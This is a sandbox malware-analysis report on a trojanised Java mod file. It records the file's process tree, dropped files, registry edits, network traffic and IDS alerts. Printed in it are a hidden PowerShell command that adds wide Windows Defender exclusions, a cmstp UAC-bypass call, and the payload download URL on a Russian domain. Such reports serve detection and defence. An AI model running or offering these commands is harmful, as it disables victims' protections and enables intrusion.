File name:

Bombamod-2.0.0.jar

Full analysis: https://app.any.run/tasks/7f1e5162-acd9-44e7-8a84-0ff9b74db546
Verdict: Malicious activity
Analysis date: March 27, 2026, 16:19:35
OS: Windows 10 Professional (build: 19044, 64 bit)
Tags:
etherhiding
Indicators:
MIME: application/java-archive
File info: Java archive data (JAR)
MD5:

77374F817841D27EC1DB845ED4601EDF

SHA1:

3E92A6860BCF6F2D3B6AA168686CBD45ACF1E51D

SHA256:

800446D4E857C1D5D684B365AE14164048FDFE9A2B1FA2E59F352F9EBE6BDD2E

SSDEEP:

12288:3AsiYrvJKBpgGLYhsnS4Vez/bly2oNkOkcs+OoCMMmUMRsYWug:KYrvJKBpgGLYhsnS4Vez/blvoN9kcsUu

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Known privilege escalation attack

      • dllhost.exe (PID: 7116)

    • Run PowerShell with an invisible window

      • powershell.exe (PID: 5524)

    • Adds process to the Windows Defender exclusion list

      • cmd.exe (PID: 3136)

    • Changes Windows Defender settings

      • cmd.exe (PID: 3136)

  • SUSPICIOUS

    • Application launched itself

      • javaw.exe (PID: 1684)

    • Runs shell command (SCRIPT)

      • wscript.exe (PID: 8096)

    • The process executes VB scripts

      • wscript.exe (PID: 8096)

    • Used cmstp for execute code hidden within an inf file

      • javaw.exe (PID: 4316)

    • Executing commands from ".cmd" file

      • javaw.exe (PID: 5604)

    • Script adds exclusion process to Windows Defender

      • cmd.exe (PID: 3136)

    • Executable content was dropped or overwritten

      • javaw.exe (PID: 5604)
      • javaw.exe (PID: 4316)

    • Adds exclusion path to Windows Defender (POWERSHELL)

      • cmd.exe (PID: 3136)

    • Starts CMD.EXE for commands execution

      • cmd.exe (PID: 3136)

    • Starts POWERSHELL.EXE for commands execution

      • cmd.exe (PID: 3136)

  • INFO

    • Checks supported languages

      • javaw.exe (PID: 4316)
      • javaw.exe (PID: 1684)
      • javaw.exe (PID: 5604)

    • Create files in a temporary directory

      • javaw.exe (PID: 1684)
      • javaw.exe (PID: 5604)
      • javaw.exe (PID: 4316)

    • Reads Environment values

      • javaw.exe (PID: 1684)
      • javaw.exe (PID: 4316)
      • javaw.exe (PID: 5604)

    • Reads CPU info

      • javaw.exe (PID: 1684)
      • javaw.exe (PID: 5604)
      • javaw.exe (PID: 4316)

    • Checks transactions between databases Windows and Oracle

      • cmstp.exe (PID: 7936)

    • Disables trace logs

      • dllhost.exe (PID: 7116)
      • cmstp.exe (PID: 7936)

    • Reads the machine GUID from the registry

      • javaw.exe (PID: 5604)
      • javaw.exe (PID: 4316)

    • Checks if a key exists in the options dictionary (POWERSHELL)

      • powershell.exe (PID: 5524)

    • Reads the computer name

      • javaw.exe (PID: 5604)
      • javaw.exe (PID: 4316)

    • Creates files or folders in the user directory

      • javaw.exe (PID: 4316)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.spe | SPSS Extension (61.8)
.jar | Java Archive (29.8)
.zip | ZIP compressed archive (8.2)

EXIF

ZIP

ZipRequiredVersion: 20
ZipBitFlag: -
ZipCompression: None
ZipModifyDate: 2026:03:27 16:16:24
ZipCRC: 0x04e3bcf9
ZipCompressedSize: 450
ZipUncompressedSize: 450
ZipFileName: META-INF/MANIFEST.MF
No data.
screenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
143
Monitored processes
11
Malicious processes
4
Suspicious processes
2

Behavior graph

Click at the process to see the details
start javaw.exe no specs javaw.exe slui.exe cmstp.exe no specs CMSTPLUA wscript.exe no specs javaw.exe cmd.exe no specs conhost.exe no specs powershell.exe no specs svchost.exe

Process information

PID
CMD
Path
Indicators
Parent process
1684"C:\Program Files\Java\jdk-25.0.2\bin\javaw.exe" -jar C:\Users\admin\Desktop\Bombamod-2.0.0.jarC:\Program Files\Java\jdk-25.0.2\bin\javaw.exeexplorer.exe
User:
admin
Company:
N/A
Integrity Level:
MEDIUM
Description:
Java(TM) Platform SE binary
Exit code:
0
Version:
25.0.2.0
Modules
Images
c:\program files\java\jdk-25.0.2\bin\javaw.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\ucrtbase.dll
c:\program files\java\jdk-25.0.2\bin\jli.dll
c:\program files\java\jdk-25.0.2\bin\vcruntime140.dll
c:\windows\system32\user32.dll
c:\windows\system32\win32u.dll
2232C:\WINDOWS\system32\svchost.exe -k NetworkService -p -s DnscacheC:\Windows\System32\svchost.exe
services.exe
User:
NETWORK SERVICE
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Host Process for Windows Services
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\svchost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\kernel.appcore.dll
3136cmd.exe /c C:\Users\admin\AppData\Local\Temp\WinDefConfig.cmdC:\Windows\System32\cmd.exejavaw.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Windows Command Processor
Exit code:
1
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\cmdext.dll
c:\windows\system32\advapi32.dll
3420\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
3580C:\WINDOWS\System32\slui.exe -EmbeddingC:\Windows\System32\slui.exe
svchost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Activation Client
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\slui.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\user32.dll
4316"C:\Program Files\Java\jdk-25.0.2\bin\javaw.exe" -jar C:\Users\admin\Desktop\Bombamod-2.0.0.jar --jwC:\Program Files\Java\jdk-25.0.2\bin\javaw.exe
javaw.exe
User:
admin
Company:
N/A
Integrity Level:
MEDIUM
Description:
Java(TM) Platform SE binary
Exit code:
0
Version:
25.0.2.0
Modules
Images
c:\program files\java\jdk-25.0.2\bin\javaw.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\ucrtbase.dll
c:\program files\java\jdk-25.0.2\bin\vcruntime140.dll
c:\program files\java\jdk-25.0.2\bin\jli.dll
c:\windows\system32\user32.dll
c:\windows\system32\win32u.dll
5524powershell -W Hidden -C "Add-MpPreference -ExclusionPath 'C:\Users\admin\AppData\Roaming\Microsoft\Tlmtry' -EA 0; Add-MpPreference -ExclusionPath 'C:\Users\admin\AppData\Roaming\Microsoft\SecurityUpdates' -EA 0; Add-MpPreference -ExclusionPath 'C:\Users\admin\AppData\Roaming\ChromeDriver' -EA 0; Add-MpPreference -ExclusionPath 'C:\Users\admin\AppData\Roaming\ChromeDriver\chromedriver.dll' -EA 0; Add-MpPreference -ExclusionPath 'C:\Users\admin\AppData\Roaming\Security' -EA 0; Add-MpPreference -ExclusionPath 'C:\Users\admin\AppData\Roaming' -EA 0; Add-MpPreference -ExclusionPath 'C:\Users\admin\AppData\Local\Temp' -EA 0; Add-MpPreference -ExclusionPath 'C:\Users\admin\AppData\Local\Temp\' -EA 0; Add-MpPreference -ExclusionPath 'C:\Users\admin\Desktop' -EA 0; Add-MpPreference -ExclusionPath 'C:\Users\admin\Downloads' -EA 0; Add-MpPreference -ExclusionPath 'C:\Windows\Temp' -EA 0; Add-MpPreference -ExclusionPath 'C:\Users\admin' -EA 0; Add-MpPreference -ExclusionPath 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -EA 0; Add-MpPreference -ExclusionProcess 'javaw.exe' -EA 0; Add-MpPreference -ExclusionProcess 'java.exe' -EA 0; Add-MpPreference -ExclusionProcess 'RuntimeBroker.exe' -EA 0; Add-MpPreference -ExclusionProcess 'SystemInterrupt.exe' -EA 0; Add-MpPreference -ExclusionProcess 'powershell.exe' -EA 0; Add-MpPreference -ExclusionProcess 'SystemInterrupts.exe' -EA 0; Add-MpPreference -ExclusionProcess 'Injector.exe' -EA 0; Add-MpPreference -ExclusionProcess 'SystemInterrupt.exe' -EA 0; Add-MpPreference -ExclusionProcess 'chrome.exe' -EA 0; Add-MpPreference -ExclusionProcess 'brave.exe' -EA 0; Add-MpPreference -ExclusionProcess 'msedge.exe' -EA 0; Add-MpPreference -ExclusionProcess 'Telemetry.exe' -EA 0; Add-MpPreference -ExclusionProcess 'abcfg.exe' -EA 0; Add-MpPreference -ExclusionProcess 'Pjibf.exe' -EA 0; Add-MpPreference -ExclusionProcess 'file2.exe' -EA 0; " C:\Windows\System32\WindowsPowerShell\v1.0\powershell.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Windows PowerShell
Exit code:
1
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
5604"C:\Program Files\Java\jdk-25.0.2\bin\javaw.exe" -cp "C:\Users\admin\AppData\Local\Temp\elevator.jar" dev.majanito.Main b64:eyJleGVjdXRpb25FbnZpcm9ubWVudCI6IkRvdWJsZUNsaWNrIiwidXNlcklkIjoiOTcxMmQ3NmItYjEyNi00ZjIzLTgyYjUtODI3YTEwMjJkYWVhIn0=C:\Program Files\Java\jdk-25.0.2\bin\javaw.exe
wscript.exe
User:
admin
Company:
N/A
Integrity Level:
HIGH
Description:
Java(TM) Platform SE binary
Exit code:
1
Version:
25.0.2.0
Modules
Images
c:\program files\java\jdk-25.0.2\bin\javaw.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\ucrtbase.dll
c:\program files\java\jdk-25.0.2\bin\jli.dll
c:\program files\java\jdk-25.0.2\bin\vcruntime140.dll
c:\windows\system32\user32.dll
c:\windows\system32\win32u.dll
c:\windows\system32\gdi32.dll
7116C:\WINDOWS\system32\DllHost.exe /Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}C:\Windows\System32\dllhost.exe
svchost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
COM Surrogate
Exit code:
0
Version:
10.0.19041.3636 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\dllhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\kernel.appcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\bcryptprimitives.dll
7936cmstp.exe /au "C:\Users\admin\AppData\Local\Temp\\nyungfmyod.xdmf"C:\Windows\System32\cmstp.exejavaw.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Connection Manager Profile Installer
Exit code:
0
Version:
7.2.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\cmstp.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
Total events
12 505
Read events
12 471
Write events
34
Delete events
0

Modification events

(PID) Process:(3580) slui.exeKey:HKEY_CLASSES_ROOT\Local Settings\MuiCache\3d\52C64B7E
Operation:writeName:@%SystemRoot%\System32\sppcomapi.dll,-3200
Value:
Software Licensing
(PID) Process:(7936) cmstp.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\CMSTP
Operation:writeName:EnableFileTracing
Value:
0
(PID) Process:(7936) cmstp.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\CMSTP
Operation:writeName:EnableAutoFileTracing
Value:
0
(PID) Process:(7936) cmstp.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\CMSTP
Operation:writeName:EnableConsoleTracing
Value:
0
(PID) Process:(7936) cmstp.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\CMSTP
Operation:writeName:FileTracingMask
Value:
(PID) Process:(7936) cmstp.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\CMSTP
Operation:writeName:ConsoleTracingMask
Value:
(PID) Process:(7936) cmstp.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\CMSTP
Operation:writeName:MaxFileSize
Value:
1048576
(PID) Process:(7936) cmstp.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\CMSTP
Operation:writeName:FileDirectory
Value:
%windir%\tracing
(PID) Process:(7936) cmstp.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Network\Network Connections
Operation:writeName:DesktopShortcut
Value:
0
(PID) Process:(7116) dllhost.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion
Operation:writeName:SM_AccessoriesName
Value:
Accessories
Executable files
5
Suspicious files
2
Text files
8
Unknown types
0

Dropped files

PID
Process
Filename
Type
4316javaw.exeC:\Users\admin\AppData\Local\Temp\jna-1774628395904\jnidispatch.dllexecutable
MD5:2D2475F1F026DD54E9F3E787AE4F81DA
SHA256:5A7FF949F6D93D86491EB5B26B1CFC60051168A60622650224B89995AC420023
4316javaw.exeC:\Users\admin\AppData\Local\Temp\elevator.jartext
MD5:140B2805EF1B809767937EEE69605033
SHA256:A84BF90031B08C9B8ABE7C2B55B8A06A8DDD585F1BA5F68E423808CCC5782EA7
4316javaw.exeC:\Users\admin\AppData\Local\Temp\elv.vbstext
MD5:0411D74A70CD2DEC8799818C89E77F39
SHA256:D9232CA4C4964B9A78F9C1D8030A7328B2F86601F9909D0B5F39A565B0567A3D
5604javaw.exeC:\Users\admin\AppData\Local\Temp\WinDefConfig.cmdtext
MD5:C925DCFC4CDBDBED3465824646A660FB
SHA256:1B5CA4D2B5EB23041DA0F6EFFDC408D50768701D4140A21C9FBD244F9458D720
5604javaw.exeC:\Users\admin\AppData\Local\Temp\lib6242134826451429154.tmpexecutable
MD5:FC78CC5162E5B7996901A34C39986D9E
SHA256:6800156D772B2E256A875E47FA6267A266A06C486C7CA5D319ABEF0B0AC4C1E7
5604javaw.exeC:\Users\admin\AppData\Local\Temp\jna-1774628407626\jnidispatch.dllexecutable
MD5:2D2475F1F026DD54E9F3E787AE4F81DA
SHA256:5A7FF949F6D93D86491EB5B26B1CFC60051168A60622650224B89995AC420023
4316javaw.exeC:\Users\admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-1693682860-607145093-2874071422-1001\83aa4cc77f591dfc2374580bbd95f6ba_bb926e54-e3ca-40fd-ae90-2764341e7792binary
MD5:C8366AE350E7019AEFC9D1E6E6A498C6
SHA256:11E6ACA8E682C046C83B721EEB5C72C5EF03CB5936C60DF6F4993511DDC61238
4316javaw.exeC:\Users\admin\AppData\Local\Temp\lib11800948593590041916.tmpexecutable
MD5:FC78CC5162E5B7996901A34C39986D9E
SHA256:6800156D772B2E256A875E47FA6267A266A06C486C7CA5D319ABEF0B0AC4C1E7
4316javaw.exeC:\Users\admin\AppData\Local\Temp\nyungfmyod.xdmftext
MD5:A18FB0BBE3E67074CA6D0134C0B7D5F7
SHA256:FDCEAFE4DCF9CF6D23B2033824275C08EC73D6B01ADC644416E43ECCA94C89C9
5524powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_xaoadr5y.uf3.psm1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
24
TCP/UDP connections
32
DNS requests
14
Threats
9

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
5276
MoUsoCoreWorker.exe
GET
200
184.24.77.6:80
http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl
NL
binary
825 b
whitelisted
6260
svchost.exe
GET
200
184.24.77.6:80
http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl
NL
binary
825 b
whitelisted
3580
slui.exe
POST
500
48.192.1.65:443
https://activation-v2.sls.microsoft.com/SLActivateProduct/SLActivateProduct.asmx?configextension=Retail
US
text
512 b
whitelisted
5276
MoUsoCoreWorker.exe
GET
200
23.52.181.212:80
http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl
US
binary
814 b
whitelisted
4316
javaw.exe
GET
200
185.178.208.129:443
https://whreceiverrrrrrrrr.ru/files/jar/module
RU
text
6.69 Mb
unknown
4316
javaw.exe
POST
200
51.254.59.59:443
https://eth.api.onfinality.io/public
FR
binary
934 b
malicious
4316
javaw.exe
POST
200
51.254.59.59:443
https://eth.api.onfinality.io/public
FR
binary
934 b
malicious
5604
javaw.exe
GET
200
1.1.1.1:443
https://cloudflare-dns.com/dns-query?name=eth.api.onfinality.io&type=A
AU
text
287 b
unknown
4316
javaw.exe
GET
200
1.1.1.1:443
https://cloudflare-dns.com/dns-query?name=eth.api.onfinality.io&type=A
AU
text
287 b
unknown
5604
javaw.exe
GET
200
1.1.1.1:443
https://cloudflare-dns.com/dns-query?name=whreceiverrrrrrrrr.ru&type=A
AU
binary
208 b
unknown
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
4
System
192.168.100.255:137
Not routed
whitelisted
6260
svchost.exe
40.127.240.158:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
US
whitelisted
5276
MoUsoCoreWorker.exe
40.127.240.158:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
US
whitelisted
8028
slui.exe
48.192.1.65:443
activation-v2.sls.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
US
whitelisted
4
System
192.168.100.255:138
Not routed
whitelisted
6260
svchost.exe
184.24.77.6:80
crl.microsoft.com
AKAMAI-ASN1
NL
whitelisted
5276
MoUsoCoreWorker.exe
184.24.77.6:80
crl.microsoft.com
AKAMAI-ASN1
NL
whitelisted
6260
svchost.exe
23.52.181.212:80
www.microsoft.com
AKAMAI-AS
US
whitelisted
5276
MoUsoCoreWorker.exe
23.52.181.212:80
www.microsoft.com
AKAMAI-AS
US
whitelisted
6260
svchost.exe
20.73.194.208:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
US
whitelisted

DNS requests

Domain
IP
Reputation
settings-win.data.microsoft.com
  • 40.127.240.158
  • 20.73.194.208
  • 51.124.78.146
whitelisted
activation-v2.sls.microsoft.com
  • 48.192.1.65
whitelisted
google.com
  • 142.251.141.78
whitelisted
crl.microsoft.com
  • 184.24.77.6
  • 184.24.77.23
  • 184.24.77.37
  • 184.24.77.42
  • 184.24.77.12
  • 184.24.77.11
  • 23.55.110.211
  • 23.55.110.193
whitelisted
www.microsoft.com
  • 23.52.181.212
  • 88.221.169.152
whitelisted
eth.llamarpc.com
  • 172.67.167.200
  • 104.21.67.22
malicious
eth.api.onfinality.io
  • 51.254.59.59
malicious
whreceiverrrrrrrrr.ru
  • 185.178.208.129
malicious
cloudflare-dns.com
  • 104.16.249.249
  • 104.16.248.249
whitelisted
self.events.data.microsoft.com
  • 20.42.65.94
whitelisted

Threats

PID
Process
Class
Message
A Network Trojan was detected
ET MALWARE EtherHiding Exfil M2
A Network Trojan was detected
ET MALWARE EtherHiding Exfil M2
Misc activity
INFO [ANY.RUN] DDoS-Guard Hosted Web Content observed
2232
svchost.exe
Misc activity
INFO [ANY.RUN] Cloudflare DNS-over-HTTPS service requested (cloudflare-dns .com)
4316
javaw.exe
Misc activity
ET INFO Observed Cloudflare DNS over HTTPS Domain (cloudflare-dns .com in TLS SNI)
A Network Trojan was detected
ET MALWARE EtherHiding Exfil M2
A Network Trojan was detected
ET MALWARE EtherHiding Exfil M2
A Network Trojan was detected
ET MALWARE EtherHiding Exfil M2
A Network Trojan was detected
ET MALWARE EtherHiding Exfil M2
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2026 ANY.RUN ALL RIGHTS RESERVED
ANY.RUN
Reports
Bombamod-2.0.0.jar